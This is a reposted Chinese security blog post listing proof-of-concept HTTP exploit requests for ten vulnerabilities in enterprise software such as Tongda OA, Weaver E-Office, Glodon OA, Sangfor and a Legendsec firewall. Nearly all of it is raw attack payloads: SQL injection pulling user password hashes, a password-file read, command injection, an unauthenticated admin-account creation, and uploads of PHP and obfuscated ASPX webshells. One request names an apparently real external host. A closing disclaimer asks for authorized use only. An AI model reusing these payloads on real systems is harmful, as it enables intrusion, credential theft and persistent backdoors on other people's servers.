Hvv | 0day Vulnerability PoCs, Shh~

admin, 2023-08-12 11:13:52

0x01 Tongda OA SQL injection vulnerability (CVE-2023-4166)

GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

0x02 Weaver E-Office9 file upload vulnerability (CVE-2023-2648)

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.233.10:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

0x03 Landray OA unauthenticated arbitrary code execution vulnerability

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: www.ynjd.cn:801
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

var={"body":{"file":"file:///etc/passwd"}}

0x04 Hand SRM tomcat.jsp login bypass vulnerability

/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
Then access the back end: /main.screen

0x05 Glodon OA SQL injection vulnerability

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

0x06 Glodon OA authenticated (back-end) file upload vulnerability

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: 10.10.10.1:8888
X-Requested-With: Ext.basex
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept: */*
Origin: http://10.10.10.1
Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
Cookie:
Connection: close
Content-Length: 421

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text

<%@ Page Language="Jscript" Debug=true%><%var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';var GFMA=Request.Form("qmq1");var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);eval(GFMA, ONOQ);%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

0x07 Mingyu Operations Audit and Risk Control System (bastion host) arbitrary user registration

POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx
Cookie: LANG=zh;USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99","Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 1121

<?xml version="1.0"?>
<methodCall><methodName>web.user_add</methodName><params><param><value><array><data><value><string>admin</string></value><value><string>5</string></value><value><string>XX.XX.XX.XX</string></value></data></array></value></param><param><value><struct><member><name>uname</name><value><string>deptadmin</string></value></member><member><name>name</name><value><string>deptadmin</string></value></member><member><name>pwd</name><value><string>Deptadmin@123</string></value></member><member><name>authmode</name><value><string>1</string></value></member><member><name>deptid</name><value><string></string></value></member><member><name>email</name><value><string></string></value></member><member><name>mobile</name><value><string></string></value></member><member><name>comment</name><value><string></string></value></member><member><name>roleid</name><value><string>101</string></value></member></struct></value></param></params></methodCall>

0x08 Sangfor Application Delivery system command execution vulnerability

POST /rep/login
Host: 10.10.10.1:85

clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123

0x09 Legendsec SecGate 3600 firewall obj_app_upfile arbitrary file upload vulnerability

POST /?g=obj_app_upfile HTTP/1.1
Host: x.x.x.x
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)

------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="vulntest.php"
Content-Type: text/plain

<?php php马?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--

Webshell path: attachements/xxx.php

0x10 Weaver E-Office9 file upload vulnerability (CVE-2023-2523)

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.233.10:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt


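Disclaimer: The content shared by this official account is intended only for technical discussion among security enthusiasts and must not be used for illegal purposes. All penetration testing requires authorization! Otherwise you bear the consequences yourself; this official account and the original author accept no responsibility for them.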









Originally published on the WeChat official account 黑客白帽子: Hvv | 0day Vulnerability PoCs, Shh~

  • Published on 2023-08-12 11:13:52
  • When reposting, please keep the link to this article (CN-SEC中文网; thanks to the original author for their hard work): https://cn-sec.com/archives/1952375.html
